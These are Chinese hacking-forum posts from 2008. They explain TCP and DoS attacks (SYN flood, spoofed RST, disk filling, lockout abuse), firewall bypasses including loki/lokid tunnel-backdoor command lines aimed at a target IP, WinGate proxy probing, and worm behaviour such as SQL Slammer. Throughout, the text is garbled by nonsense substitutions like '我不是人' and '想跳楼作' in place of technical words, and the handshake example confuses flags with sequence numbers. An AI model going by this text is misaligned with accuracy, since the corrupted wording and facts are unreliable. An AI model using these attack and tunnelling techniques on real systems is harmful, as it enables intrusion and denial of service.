Sequence Number 和 Acknowledgment Number :是顺序号和确认号,确认号是希望接收的字节号。这都是32位的,在TCP流中,每个数据字节都被编号。Data offset :表明TCP头包含多少个32位字,用来确定头的长度,因为头中可选字段长度是不定的。Reserved : 保留的我不是人,现在没用,都是0
接下来是6个1位的标志,这是两个计算机数据交流的信息标志。接收和发送断根据这些标志来确定信息流的种类。下面是一些介绍: URG:(Urgent Pointer field significant)紧急指针。用到的时候值为1,用来处理避免TCP数据流中断ACK:(Acknowledgment field significant)置1时表示确认号(Acknowledgment Number)为合法,为0的时候表示数据段不包含确认信息,确认号被忽略。
PSH:(Push Function),PUSH标志的数据,置1时请求的数据段在接收方得到后就可直接送到应用程序,而不必等到缓冲区满时才传送。
RST:(Reset the connection)用于复位因某种原因引起出现的错误连接,也用来拒绝非法数据和请求。如果
接收到RST位时候,通常发生了某些错误。
SYN:(Synchronize sequence numbers)用来建立连接,在连接请求中,SYN=1,CK=0,连接响应时,SYN=1,
ACK=1。即,SYN和ACK来区分Connection Request和Connection Accepted。
FIN:(No more data from sender)用来释放连接,表明发送方已经没有数据发送。

知道这重要的6个指示标志后,我们继续来。
1我不是人的WINDOW字段:表示确认了字节后还可以发送多少字节。可以为0,表示已经收到包括确认号减1(即已发送所有数据)
在内的所有数据段。
接下来是1我不是人的Checksum字段,用来确保可靠性的。
1我不是人的Urgent Pointer,和下面的字段我们这里不解释了。不然太多了。呵呵,偷懒啊。

我们进入比较重要的一部分:TCP连接握手过程。这个过程简单地分为三步。在没有连接中,接受方(我们针对服务器),服务器处于LISTEN状态,等待其他机器发送连接请求。
第一步:客户端发送一个带SYN位的请求,向服务器表示需要连接,比如发送包假设请求序号为10,那么则为:SYN=10,ACK=0,然后等待服务器的响应。
第二步:服务器接收到这样的请求后,查看是否在LISTEN的是指定的端口,不然,就发送RST=1应答,拒绝建立连接。如果接收连接,那么服务器发送确认,SYN为服务器的一个内码,假设为100,ACK位则是客户端的请求序号加1,本例中发送的数据是:SYN=100,ACK=11,用这样的数据发送给客户端。向客户端表示,服务器连接已经准备好了,等待客户端的确认这时客户端接收到消息后,分析得到的信息,准备发送确认连接信号到服务器
第三步:客户端发送确认建立连接的消息给服务器。确认信息的SYN位是服务器发送的ACK位,ACK位是服务器发送的SYN位加1。即:SYN=11,ACK=101。
这时,连接已经建立起来了。然后发送数据,。这是一个基本的请求和连接过程。需要注意的是这些标志位的关系,比如SYN、ACK。

3、服务器的缓冲区队列(Backlog Queue)
服务器不会在每次接收到SYN请求就立刻同客户端建立连接,而是为连接请求分配内存空间,建立会话,并放到一个等待队列中。如果,这个等待的队列已经满了,那么,服务器就不在为新的连接分配任何东西,直接丢弃新的请求。如果到了这样的地步,服务器就是拒绝服务了。
如果服务器接收到一个RST位信息,那么就认为这是一个有错误的数据段,会根据客户端IP,把这样的连接在缓冲区队列中清除掉。这对IP欺骗有影响,也能被利用来做DOS攻击。

####################################################################

上面的介绍,我们了解TCP协议,以及连接过程。要对SERVER实施拒绝服务攻击,实质上的方式就是有两个:
一, 迫使服务器的缓冲区满,不接收新的请求。
二, 使用IP欺骗,迫使服务器把合法用户的连接复位,影响合法用户的连接
这就是DOS攻击实施的基本思想。具体实现有这样的方法:

1、SYN FLOOD
利用服务器的连接缓冲区(Backlog Queue),利用特殊的程序,设置TCP的Header,向服务器端不断地成倍发送只有SYN标志的TCP连接请求。当服务器接收的时候,都认为是没有建立起来的连接请求,于是为这些请求建立会话,排到缓冲区队列中。
如果你的SYN请求超过了服务器能容纳的限度,缓冲区队列满,那么服务器就不再接收新的请求了。其他合法用户的连接都被拒绝掉。可以持续你的SYN请求发送,直到缓冲区中都是你的只有SYN标记的请求。现在有很多实施SYN FLOOD的工具,呵呵,自己找去吧。

2、IP欺骗DOS攻击
这种攻击利用RST位来实现。假设现在有一个合法用户(1.1.1.1)已经同服务器建立了正常的连接,攻击者构造攻击的TCP数据,伪装自己的IP为 1.1.1.1,并向服务器发送一个带有RST位的TCP数据段。服务器接收到这样的数据后,认为从1.1.1.1发送的连接有错误,就会清空缓冲区中建立好的连接。这时,如果合法用户1.1.1.1再发送合法数据,服务器就已经没有这样的连接了,该用户就必
须从新开始建立连接。攻击时,伪造大量的IP地址,向目标发送RST数据,使服务器不对合法用户服务。

3、 带宽DOS攻击
如果你的连接带宽足够大而服务器又不是很大,你可以发送请求,来消耗服务器的缓冲区消耗服务器的带宽。这种攻击就是人多力量大了,配合上SYN一起实施DOS,威力巨大。不过是初级DOS攻击。呵呵。Ping白宫??你发疯了啊!


4、自身消耗的DOS攻击
这是一种老式的攻击手法。说老式,是因为老式的系统有这样的自身BUG。比如Win95 (winsock v1), Cisco IOS v.10.x, 和其他过时的系统。
这种DOS攻击就是把请求客户端IP和端口弄成主机的IP端口相同,发送给主机。使得主机给自己发送TCP请求和连接。这种主机的漏洞会很快把资源消耗光。直接导致当机。这中伪装对一些身份认证系统还是威胁巨大的。
上面这些实施DOS攻击的手段最主要的就是构造需要的TCP数据,充分利用TCP协议。这些攻击方法都是建立在TCP基础上的。还
有其他的DOS攻击手段。

5、塞满服务器的硬盘
通常,如果服务器可以没有限制地执行写想跳楼作,那么都能成为塞满硬盘造成DOS攻击的途径,比如:
发送垃圾邮件。一般公司的服务器可能把邮件服务器和WEB服务器都放在一起。破坏者可以发送大量的垃圾邮件,这些邮件可能都塞在一个邮件队列中或者就是坏邮件队列中,直到邮箱被撑破或者把硬盘塞满。
让日志记录满。入侵者可以构造大量的错误信息发送出来,服务器记录这些错误,可能就造成日志文件非常庞大,甚至会塞满硬盘。同时会让管理员痛苦地面对大量的日志,甚至就不能发现入侵者真正的入侵途径。
向匿名FTP塞垃圾文件。这样也可以塞满硬盘空间。

6、合理利用策略
一般服务器都有关于帐户锁定的安全策略,比如,某个帐户连续3次登陆失败,那么这个帐号将被锁定。这点也可以被破坏者利用,他们伪装一个帐号去错误登陆,这样使得这个帐号被锁定,而正常的合法用户就不能使用这个帐号去登陆系统了
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 49 发表于: 2008-06-14 22:47:30
如何突破各种防火墙

现在随着人们的安全意识加强,防火墙一般都被公司企业采用来保障网络的安全,一般的攻击者在有防火墙的情况下,一般是很难入侵的。下面谈谈有防火墙环境下的攻击和检测。

  一 防火墙基本原理

  首先,我们需要了解一些基本的防火墙实现原理。防火墙目前主要分包过滤,和状态检测的包过滤,应用层代理防火墙。但是他们的基本实现都是类似的。

│ │---路由器-----网卡│防火墙│网卡│----------内部网络│ │

  防火墙一般有两个以上的网络卡,一个连到外部(router),另一个是连到内部网络。当打开主机网络转发功能时,两个网卡间的网络通讯能直接通过。当有防火墙时,他好比插在网卡之间,对所有的网络通讯进行控制。

  说到访问控制,这是防火墙的核心了:),防火墙主要通过一个访问控制表来判断的,他的形式一般是一连串的如下规则:

  1 accept from+ 源地址,端口 to+ 目的地址,端口+ 采取的动作

  2 deny ...........(deny就是拒绝。。)

  3 nat ............(nat是地址转换。后面说)

  防火墙在网络层(包括以下的炼路层)接受到网络数据包后,就从上面的规则连表一条一条地匹配,如果符合就执行预先安排的动作了!如丢弃包。。。。

  但是,不同的防火墙,在判断攻击行为时,有实现上的差别。下面结合实现原理说说可能的攻击。


  二 攻击包过滤防火墙

  包过滤防火墙是最简单的一种了,它在网络层截获网络数据包,根据防火墙的规则表,来检测攻击行为。他根据数据包的源IP地址;目的IP地址;TCP/UDP源端口;TCP/UDP目的端口来过滤!!很容易受到如下攻击:

  1 ip 欺骗攻击:

  这种攻击,主要是修改数据包的源,目的地址和端口,模仿一些合法的数据包来骗过防火墙的检测。如:外部攻击者,将他的数据报源地址改为内部网络地址,防火墙看到是合法地址就放行了:)。可是,如果防火墙能结合接口,地址来匹配,这种攻击就不能成功了:(

  2 d.o.s拒绝服务攻击

  简单的包过滤防火墙不能跟踪 tcp的状态,很容易受到拒绝服务攻击,一旦防火墙受到d.o.s攻击,他可能会忙于处理,而忘记了他自己的过滤功能。:)你就可以饶过了,不过这样攻击还很少的。!

  3 分片攻击

  这种攻击的原理是:在IP的分片包中,所有的分片包用一个分片偏移字段标志分片包的顺序,但是,只有第一个分片包含有TCP端口号的信息。当IP分片包通过分组过滤防火墙时,防火墙只根据第一个分片包的Tcp信息判断是否允许通过,而其他后续的分片不作防火墙检测,直接让它们通过。

  这样,攻击者就可以通过先发送第一个合法的IP分片,骗过防火墙的检测,接着封装了恶意数据的后续分片包就可以直接穿透防火墙,直接到达内部网络主机,从而威胁网络和主机的安全。

  4 木马攻击

  对于包过滤防火墙最有效的攻击就是木马了,一但你在内部网络安装了木马,防火墙基本上是无能为力的。

  原因是:包过滤防火墙一般只过滤低端口(1-1024),而高端口他不可能过滤的(因为,一些服务要用到高端口,因此防火墙不能关闭高端口的),所以很多的木马都在高端口打开等待,如冰河,subseven等。。。

  但是木马攻击的前提是必须先上传,运行木马,对于简单的包过滤防火墙来说,是容易做的。这里不写这个了。大概就是利用内部网络主机开放的服务漏洞。
  
  早期的防火墙都是这种简单的包过滤型的,到现在已很少了,不过也有。现在的包过滤采用的是状态检测技术,下面谈谈状态检测的包过滤防火墙。

  三 攻击状态检测的包过滤

  状态检测技术最早是checkpoint提出的,在国内的许多防火墙都声称实现了状态检测技术。

  可是:)很多是没有实现的。到底什么是状态检测?

  一句话,状态检测就是从tcp连接的建立到终止都跟踪检测的技术。

  原先的包过滤,是拿一个一个单独的数据包来匹配规则的。可是我们知道,同一个tcp连接,他的数据包是前后关联的,先是syn包,-》数据包=》fin包。数据包的前后序列号是相关的。
 
  如果割裂这些关系,单独的过滤数据包,很容易被精心够造的攻击数据包欺骗!!!如nmap的攻击扫描,就有利用syn包,fin包,reset包来探测防火墙后面的网络。!

  相反,一个完全的状态检测防火墙,他在发起连接就判断,如果符合规则,就在内存登记了这个连接的状态信息(地址,port,选项。。),后续的属于同一个连接的数据包,就不需要在检测了。直接通过。而一些精心够造的攻击数据包由于没有在内存登记相应的状态信息,都被丢弃了。这样这些攻击数据包,就不能饶过防火墙了。

  说状态检测必须提到动态规则技术。在状态检测里,采用动态规则技术,原先高端口的问题就可以解决了。实现原理是:平时,防火墙可以过滤内部网络的所有端口(1-65535),外部攻击者难于发现入侵的切入点,可是为了不影响正常的服务,防火墙一但检测到服务必须开放高端口时,如(ftp协议,irc 等),防火墙在内存就可以动态地天加一条规则打开相关的高端口。等服务完成后,这条规则就又被防火墙删除。这样,既保障了安全,又不影响正常服务,速度也快。!

  一般来说,完全实现了状态检测技术防火墙,智能性都比较高,一些扫描攻击还能自动的反应,因此,攻击者要很小心才不会被发现。

  但是,也有不少的攻击手段对付这种防火墙的。

  1 协议隧道攻击

  协议隧道的攻击思想类似与VPN的实现原理,攻击者将一些恶意的攻击数据包隐藏在一些协议分组的头部,从而穿透防火墙系统对内部网络进行攻击。

  例如,许多简单地允许ICMP回射请求、ICMP回射应答和UDP分组通过的防火墙就容易受到ICMP和UDP协议隧道的攻击。Loki和lokid (攻击的客户端和服务端)是实施这种攻击的有效的工具。在实际攻击中,攻击者首先必须设法在内部网络的一个系统上安装上lokid服务端,而后攻击者就可以通过loki客户端将希望远程执行的攻击命令(对应IP分组)嵌入在ICMP或UDP包头部,再发送给内部网络服务端lokid,由它执行其中的命令,并以同样的方式返回结果。由

  于许多防火墙允许ICMP和UDP分组自由出入,因此攻击者的恶意数据就能附带在正常的分组,绕过防火墙的认证,顺利地到达攻击目标主机下面的命令是用于启动lokid服务器程序:

lokid-p–I–vl

loki客户程序则如下启动:

loki–d172.29.11.191(攻击目标主机)-p–I–v1–t3

  这样,lokid和loki就联合提供了一个穿透防火墙系统访问目标系统的一个后门。

  2 利用FTP-pasv绕过防火墙认证的攻击

  FTP-pasv攻击是针对防火墙实施入侵的重要手段之一。目前很多防火墙不能过滤这种攻击手段。如CheckPoint的Firewall-1,在监视FTP服务器发送给客户端的包的过程中,它在每个包中寻找"227"这个字符串。如果发现这种包,将从中提取目标地址和端口,并对目标地址加以验证,通过后,将允许建立到该地址的TCP连接。

  攻击者通过这个特性,可以设法连接受防火墙保护的服务器和服务。详细的描述可见:http://www.checkpoint.com/techsupport/alerts/pasvftp.html

  3 反弹木马攻击

  反弹木马是对付这种防火墙的最有效的方法。攻击者在内部网络的反弹木马定时地连接外部攻击者控制的主机,由于连接是从内部发起的,防火墙(任何的防火墙)都认为是一个合法的连接,因此基本上防火墙的盲区就是这里了。防火墙不能区分木马的连接和合法的连接。

  但是这种攻击的局限是:必须首先安装这个木马!!!所有的木马的第一步都是关键!!!

  四 攻击代理

  代理是运行在应用层的防火墙,他实质是启动两个连接,一个是客户到代理,另一个是代理到目的服务器。

  实现上比较简单,和前面的一样也是根据规则过滤。由于运行在应用层速度比较慢/1

  攻击代理的方法很多。

  这里就以wingate为例,简单说说了。(太累了)

  WinGate是目前应用非常广泛的一种Windows95/NT代理防火墙软件,内部用户可以通过一台安装有WinGate的主机访问外部网络,但是它也存在着几个安全脆弱点。

  黑客经常利用这些安全漏洞获得WinGate的非授权Web、Socks和Telnet的访问,从而伪装成WinGate主机的身份对下一个攻击目标发动攻击。因此,这种攻击非常难于被跟踪和记录。
  
  导致WinGate安全漏洞的原因大多数是管理员没有根据网络的实际情况对WinGate代理防火墙软件进行合理的设置,只是简单地从缺省设置安装完毕后就让软件运行,这就给攻击者可乘之机。

  1 非授权Web访问

  某些WinGate版本(如运行在NT系统下的2.1d版本)在误配置情况下,允许外部主机完全匿名地访问因特网。因此,外部攻击者就可以利用 WinGate主机来对Web服务器发动各种Web攻击(如CGI的漏洞攻击等),同时由于Web攻击的所有报文都是从80号Tcp端口穿过的,因此,很难追踪到攻击者的来源。

  检测

  检测WinGate主机是否有这种安全漏洞的方法如下:

  1) 以一个不会被过滤掉的连接(譬如说拨号连接)连接到因特网上。

  2) 把浏览器的代理服务器地址指向待测试的WinGate主机。

  如果浏览器能访问到因特网,则WinGate主机存在着非授权Web访问漏洞。


  2 非授权Socks访问

  在WinGate的缺省配置中,Socks代理(1080号Tcp端口)同样是存在安全漏洞。与打开的Web代理(80号Tcp端口)一样,外部攻击者可以利用Socks代理访问因特网。


  防范

  要防止攻击WinGate的这个安全脆弱点,管理员可以限制特定服务的捆绑。在多宿主(multi homed)系统上,执行以下步骤以限定如何提供代理服务。

  1选择Socks或WWWProxyServer属性。

  2选择Bindings标签。

  3按下ConnectiollBeAcceptedOnTheFollowingInterfaceOnly按钮,并指定本WinGate服务器的内部接口。

  非授权Telnet访问

  它是WinGate最具威胁的安全漏洞。通过连接到一个误配置的WinGate服务器的Telnet服务,攻击者可以使用别人的主机隐藏自己的踪迹,随意地发动攻击。

  检测

  检测WinGate主机是否有这种安全漏洞的方法如下:

  1.使用telnet尝试连接到一台WinGate服务器。

[root@happy/tmp]#telnet172.29.11.191

Trying172.29.11.191….

Connectedto172.29.11.191.

Escapecharacteris‘^]’.

Wingate>10.50.21.5


  2.如果接受到如上的响应文本,那就输入待连接到的网站。


  3.如果看到了该新系统的登录提示符,那么该服务器是脆弱的。

Connectedtohost10.50.21.5…Connected

SunOS5.6

Login:

  对策

  防止这种安全脆弱点的方法和防止非授权Socks访问的方法类似。在WinGate中简单地限制特定服务的捆绑就可以解决这个问题。一般来说,在多宿主(multihomed)系统管理员可以通过执行以下步骤来完成:

  1.选择TelnetSever属性。

  2.选择Bindings标签。

  3.按下ConnectiollBeAcceptedOnTheFollowingInterfaceOnly按钮,并指定本WinGate服务器的内部接口。


  五 后话

  有防火墙的攻击不单是上面的一点,我有什么写的不对的,大家指正。

  一直以来,黑客都在研究攻击防火墙的技术和手段,攻击的手法和技术越来越智能化和多样化。但是就黑客攻击防火墙的过程上看,大概可以分为三类攻击。

  第一类攻击防火墙的方法是探测在目标网络上安装的是何种防火墙系统并且找出此防火墙系统允许哪些服务。我们叫它为对防火墙的探测攻击。

  第二类攻击防火墙的方法是采取地址欺骗、TCP序号攻击等手法绕过防火墙的认证机制,从而 对防火墙和内部网络破坏。

  第三类攻击防火墙的方法是寻找、利用防火墙系统实现和设计上的安全漏洞,从而有针对性地发动攻击。这种攻击难度比较大,可是破坏性很大。
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 50 发表于: 2008-06-14 22:47:52
蠕虫技术(上)

凡能够引起计算机故障,破坏计算机数据的程序统称为计算

机病毒。所以从这个意义上说,蠕虫也是一种病毒!网络蠕虫病毒,

作为对互联网危害严重的一种计算机程序,其破坏力和传染性不容忽

视.与传统的病毒不同,蠕虫病毒以计算机为载体,以网络为攻击对

象!本文中将蠕虫病毒分为针对企业网络和个人用户2类,并从企业

用户和个人用户两个方面探讨蠕虫病毒的特征和一些防范措施!
本文根据蠕虫病毒的发作机制,将其分为利用系统级别漏洞(主动传

播)和利用社会工程学(欺骗传播)两种,并从用户角度中将蠕虫病毒

分为针对企业网络和个人用户2类,从企业用户和个人用户两个方面

探讨蠕虫病毒的特征和一些防范措施!
一 蠕虫病毒定义
1蠕虫病毒的定义
2蠕虫病毒与一般病毒的异同
3蠕虫病毒的危害和趋势
二 蠕虫病毒的分析和防范
1企业用户的防止蠕虫
2个人用户防止蠕虫
三 研究蠕虫的现实意义
一 蠕虫病毒的定义
1.1蠕虫病毒的定义
计算机病毒自出现之日起,就成为计算机的一个巨大威胁,而当网络

迅速发展的时候,蠕虫病毒引起的危害开始显现!从广义上定义,凡

能够引起计算机故障,破坏计算机数据的程序统称为计算机病毒。所

以从这个意义上说,蠕虫也是一种病毒!但是蠕虫病毒和一般的病毒

有着很大的区别.对于蠕虫,现在还没有一个成套的理论体系,一般认

为,蠕虫是一种通过网络传播的恶性病毒,它具有病毒的一些共性,如

传播性,隐蔽性,破坏性等等,同时具有自己的一些特征,如不利用文

件寄生(有的只存在于内存中),对网络造成拒绝服务,以及和黑客

技术相结合等等!在产生的破坏性上,蠕虫病毒也不是普通病毒所能

比拟的,网络的发展使得蠕虫可以在短短的时间内蔓延整个网络,造

成网络瘫痪!
在本论文中,根据使用者情况将蠕虫病毒分为2类,一种是面向企业用

户和局域网而言,这种病毒利用系统漏洞,主动进行攻击,可以对整个

互联网可造成瘫痪性的后果!以“红色代码”,“尼姆达”,以及最

新的“sql蠕虫王”为代表。另外一种是针对个人用户的,通过网络(

主要是电子邮件,恶意网页形式)迅速传播的蠕虫病毒,以爱虫病毒,求

职信病毒为例.在这两类中,第一类具有很大的主动攻击性,而且爆

发也有一定的突然性,但相对来说,查杀这种病毒并不是很难。第二

种病毒的传播方式比较复杂和多样,少数利用了微软的应用程序的漏

洞,更多的是利用社会工程学()对用户进行欺骗和诱使,这样的病毒

造成的损失是非常大的,同时也是很难根除的,比如求职信病毒,在

2001年就已经被各大杀毒厂商发现,但直到2002年底依然排在病毒危

害排行榜的首位就是证明!出得在接下来的内容中,将分别分析这两

种病毒的一些特征及防范措施!





1.2蠕虫病毒与一般病毒的异同
蠕虫也是一种病毒,因此具有病毒的共同特征。一般的病毒是需要的

寄生的,它可以通过自己指令的执行,将自己的指令代码写到其他程

序的体内,而被感染的文件就被称为”宿主”,例如,windows下可执

行文件的格式为pe格式(Portable Executable),当需要感染pe文件时

,在宿主程序中,建立一个新节,将病毒代码写到新节中,修改的程

序入口点等,这样,宿主程序执行的时候,就可以先执行病毒程序,

病毒程序运行完之后,在把控制权交给宿主原来的程序指令。可见,

病毒主要是感染文件,当然也还有像DIRII这种链接型病毒,还有引

导区病毒。引导区病毒他是感染磁盘的引导区,如果是软盘被感染,

这张软盘用在其他机器上后,同样也会感染其他机器,所以传播方式

也是用软盘等方式。
蠕虫一般不采取利用pe格式插入文件的方法,而是复制自身在互联网

环境下进行传播,病毒的传染能力主要是针对计算机内的文件系统而

言,而蠕虫病毒的传染目标是互联网内的所有计算机.局域网条件下的

共享文件夹,电子邮件email,网络中的恶意网页,大量存在着漏洞的

服务器等都成为蠕虫传播的良好途径。网络的发展也使得蠕虫病毒可

以在几个小时内蔓延全球!而且蠕虫的主动攻击性和突然爆发性将使

得人们手足无策!
普通病毒 蠕虫病毒
存在形式 寄存文件 独立程序
传染机制 宿主程序运行 主动攻击
传染目标 本地文件 网络计算机
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 51 发表于: 2008-06-14 22:48:09
蠕虫技术(中)

可以预见,未来能够给网络带来重大灾难的主要必定是网络蠕虫!
1.3蠕虫的破坏和发展趋势
1988年一个由美国CORNELL大学研究生莫里斯编写的蠕虫病毒蔓延造

成了数千台计算机停机,蠕虫病毒开始现身网络;而后来的红色代码

,尼姆达病毒疯狂的时候,造成几十亿美元的损失;北京时间2003年1

月26日, 一种名为“2003蠕虫王”的电脑病毒迅速传播并袭击了全球

,致使互联网网路严重堵塞,作为互联网主要基础的域名服务器

(DNS)的瘫痪造成网民浏览互联网网页及收发电子邮件的速度大幅

减缓, 同时银行自动提款机的运作中断, 机票等网络预订系统的运作

中断, 信用卡等收付款系统出现故障!专家估计,此病毒造成的直接经

济损失至少在12亿美元以上!
病毒名称 持续时间 造成损失
莫里斯蠕虫 1988年 6000多台计算机停机,直接经济损失达9600万美

元!
美丽杀手 1999年3月 政府部门和一些大公司紧急关闭了网络服务器,

经济损失超过12亿美元!
爱虫病毒 2000年5月至今 众多用户电脑被感染,损失超过100亿美元

以上,
红色代码 2001年7月 网络瘫痪,直接经济损失超过26亿美元
求职信 2001年12月至今 大量病毒邮件堵塞服务器,损失达数百亿美


Sql蠕虫王 2003年1月 网络大面积瘫痪,银行自动提款机运做中断,直

接经济损失超过26亿美元
由表可以知道,蠕虫病毒对网络产生堵塞作用,并造成了巨大的经济损

失!
通过对以上蠕虫病毒的分析,可以知道,蠕虫发作的一些特点和发展趋

势:
1.利用想跳楼作系统和应用程序的漏洞主动进行攻击.. 此类病毒主要是

“红色代码”和“尼姆达”,以及至今依然肆虐的”求职信”等.由于

IE浏览器的漏洞(Iframe ExecCommand),使得感

染了“尼姆达”病毒的邮件在不去手工打开附件的情况下病毒就能激

活,而此前即便是很多防病毒专家也一直认为,带有病毒附件的邮件

,只要不去打开附件,病毒不会有危害。“红色代码”是利用了微软

IIS服务器软件的漏洞(idq.dll远程缓存区溢出)来传播。Sql蠕虫王

病毒则是利用了微软的数据库系统的一个漏洞进行大肆攻击!
2传播方式多样 如“尼姆达”病毒和”求职信”病毒,可利用的传播

途径包括文件、电子邮件、Web服务器、网络共享等等.
  3.病毒制作技术新 与传统的病毒不同的是,许多新病毒是利用当

前最新的编程语言与编程技术实现的,易于修改以产生新的变种,从

而逃避反病毒软件的搜索。另外,新病毒利用Java、ActiveX、VB

script等技术,可以潜伏在HTML页面里,在上网浏览时触发。  




4.与黑客技术相结合! 潜在的威胁和损失更大!以红色代码为例,

感染后的机器的web目录的\scripts下将生成一个root.exe,可以远程

执行任何命令,从而使黑客能够再次进入!


二网络蠕虫病毒分析和防范
蠕虫和普通病毒不同的一个特征是蠕虫病毒往往能够利用漏洞,这里

的漏洞或者说是缺陷,我们分为2种,软件上的缺陷和人为上的缺陷

。软件上的缺陷,如远程溢出,微软ie和outlook的自动执行漏洞等

等,需要软件厂商和用户共同配合,不断的升级软件。而人为的缺陷

,主要是指的是计算机用户的疏忽。这就是所谓的社会工程学

(social engineering),当收到一封邮件带着病毒的求职信邮件时候

,大多数人都会报着好奇去点击的。对于企业用户来说,威胁主要集

中在服务器和大型应用软件的安全上,而个人用户而言,主要是防范

第二种缺陷。
2.1利用系统漏洞的恶性蠕虫病毒分析
在这种病毒中,以红色代码,尼姆达和sql蠕虫为代表!他们共同的特征

是利用微软服务器和应用程序组件的某个漏洞进行攻击,由于网上存

在这样的漏洞比较普遍,使得病毒很容易的传播!而且攻击的对象大都

为服务器,所以造成的网络堵塞现象严重!
以2003年1月26号爆发的sql蠕虫为例,爆发数小时内席卷了全球网络,

造成网络大塞车.亚洲国家中以人口上网普及率达七成的韩国所受影

响较为严重。韩国两大网络业KFT及南韩电讯公司,系统都陷入了瘫

痪,其它的网络用户也被迫断线,更为严重的是许多银行的自动取款

机都无法正常工作, 美国许美国银行统计,该行的13000台自动柜员

机已经无法提供正常提款。网络蠕虫病毒开始对人们的生活产生了巨

大的影响!
这次sql蠕虫攻击的是微软数据库系Microsoft SQL Server 2000的,

利用了MSSQL2000服务远程堆栈缓冲区溢出漏洞, Microsoft SQL

Server 2000是一款由Microsoft公司开发的商业性质大型数据库系统

。 SQL Server监听UDP的1434端口,客户端可以通过发送消息到这个

端口来查询目前可用的连接方式(连接方式可以是命名管道也可以是

TCP),但是此程序存在严重漏洞,当客户端发送超长数据包时,将

导致缓冲区溢出,黑客可以利用该漏洞在远程机器上执行自己的恶意

代码。
微软在200年7月份的时候就为这个漏洞发布了一个安全公告,但当sql

蠕虫爆发的时候,依然有大量的装有ms sqlserver 2000的服务器没有

安装最新的补丁,从而被蠕虫病毒所利用,蠕虫病毒通过一段376个字

节的恶意代码,远程获得对方主机的系统控制权限, 取得三个Win32

API地址,GetTickCount、socket、sendto,接着病毒使用

GetTickCount获得一个随机数,进入一个死循环继续传播。在该循环

中蠕虫使用获得的随机数生成一个随机的ip地址,然后将自身代码发

送至1434端口(Microsoft SQL Server开放端口),该蠕虫传播速度极

快,其使用广播数据包方式发送自身代码,每次均攻击子网中所有

255台可能存在机器。由于这是一个死循环的过程,发包密度仅和机

器性能和网络带宽有关,所以发送的数据量非常大。该蠕虫对被感染

机器本身并没有进行任何恶意破坏行为,也没有向硬盘上写文件,仅

仅存在与内存中。对于感染的系统,重新启动后就可以清除蠕虫,但

是仍然会重复感染。由于发送数据包占用了大量系统资源和网络带宽

,形成Udp Flood,感染了该蠕虫的网络性能会极度下降。一个百兆

网络内只要有一两台机器感染该蠕虫就会导致整个网络访问阻塞。
通过以上分析可以知道,此蠕虫病毒本身除了对网络产生拒绝服务攻

击外,并没有别的破坏措施.但如果病毒编写者在编写病毒的时候加入

破坏代码,后果将不堪设想!
离线胡可
发帖
*
今日发帖
最后登录
1970-01-01
只看该作者 52 发表于: 2008-06-14 22:48:30
蠕虫技术(下)

2.3企业防范蠕虫病毒措施
此次sql蠕虫病毒,利用的漏洞在2002年7月份微软的一份安全公告中

就有详细说明!而且微软也提供了安全补丁提供下载,然而在时隔半

年之后互联网上还有相当大的一部分服务器没有安装最新的补丁,其

网络管理员的安全防范意识可见一斑!
当前,企业网络主要应用于文件和打印服务共享、办公自动化系统、

企业业务(MIS)系统、Internet应用等领域。网络具有便利信息交

换特性,蠕虫病毒也可以充分利用网络快速传播达到其阻塞网络目的

。企业在充分地利用网络进行业务处理时,就不得不考虑企业的病毒

防范问题,以保证关系企业命运的业务数据完整不被破坏。
企业防治蠕虫病毒的时候需要考虑几个问题:病毒的查杀能力,病毒

的监控能力,新病毒的反应能力。而企业防毒的一个重要方面是是管

理和策略。推荐的企业防范蠕虫病毒的策略如下:
1. 加强网络管理员安全管理水平,提高安全意识。由于蠕虫病毒利

用的是系统漏洞进行攻击,所以需要在第一时间内保持系统和应用软

件的安全性,保持各种想跳楼作系统和应用软件的更新!由于各种漏洞的

出现,使得安全不在是一种一劳永逸的事,而作为企业用户而言,所

经受攻击的危险也是越来越大,要求企业的管理水平和安全意识也越

来越高!
2. 建立病毒检测系统。能够在第一时间内检测到网络异常和病毒攻

击。
3. 建立应急响应系统,将风险减少到最小!由于蠕虫病毒爆发的突

然性,可能在病毒发现的时候已经蔓延到了整个网络,所以在突发情

况下,建立一个紧急响应系统是很有必要的,在病毒爆发的第一时间

即能提供解决方案。
4. 建立灾难备份系统。对于数据库和数据系统,必须采用定期备份

,多机备份措施,防止意外灾难下的数据丢失!
5. 对于局域网而言,可以采用以下一些主要手段:(1)在因特网

接入口处安装防火墙式防杀计算机病毒产品,将病毒隔离在局域网之

外。(2)对邮件服务器进行监控,防止带毒邮件进行传播!(3)对

局域网用户进行安全培训。(4)建立局域网内部的升级系统,包括

各种想跳楼作系统的补丁升级,各种常用的应用软件升级,各种杀毒软件

病毒库的升级等等!





.3对个人用户产生直接威胁的蠕虫病毒
在以上分析的蠕虫病毒中,只对安装了特定的微软组件的系统进行攻

击,而对广大个人用户而言,是不会安装iis(微软的因特网服务器程

序,可以使允许在网上提供web服务)或者是庞大的数据库系统的!因

此上述病毒并不会直接攻击个个人用户的电脑(当然能够间接的通过

网络产生影响),但接下来分析的蠕虫病毒,则是对个人用户威胁最

大,同时也是最难以根除,造成的损失也更大的一类蠕虫病毒!
对于个人用户而言,威胁大的蠕虫病毒采取的传播方式一般为电子邮

件(Email)以及恶意网页等等!
对于利用email传播得蠕虫病毒来说,通常利用的是社会工程学

(Social Engineering),即以各种各样的欺骗手段那诱惑用户点击的

方式进行传播!
恶意网页确切的讲是一段黑客破坏代码程序,它内嵌在网页中,当用

户在不知情的情况下打开含有病毒的网页时,病毒就会发作。这种病

毒代码镶嵌技术的原理并不复杂,所以会被很多怀不良企图者利用,

在很多黑客网站竟然出现了关于用网页进行破坏的技术的论坛,并提

供破坏程序代码下载,从而造成了恶意网页的大面积泛滥,也使越来

越多的用户遭受损失。
对于恶意网页,常常采取vb script和java script编程的形式!由于

编程方式十分的简单!所以在网上非常的流行!
Vb script和java script是由微软想跳楼作系统的wsh(Windows

scripting HostWindows脚本主机)解析并执行的,由于其编程非常

简单,所以此类脚本病毒在网上疯狂传播,疯狂一时的爱虫病毒就是

一种vbs脚本病毒,然后伪装成邮件附件诱惑用户点击运行,更为可

怕的是,这样的病毒是以源代码的形式出现的,只要懂得一点关于脚

本编程的人就可以修改其代码,形成各种各样的变种。
下面以一个简单的脚本为例:
Set objFs=CreateObject (“scripting.FileSystemObject”)(创

建一个文件系统对象)  objFs.CreateTextFile

("C:\virus.txt", 1)(通过文件系统对象的方法创建了TXT文件) 

 如果我们把这两句话保存成为.vbs的VB脚本文件,点击就会在C盘

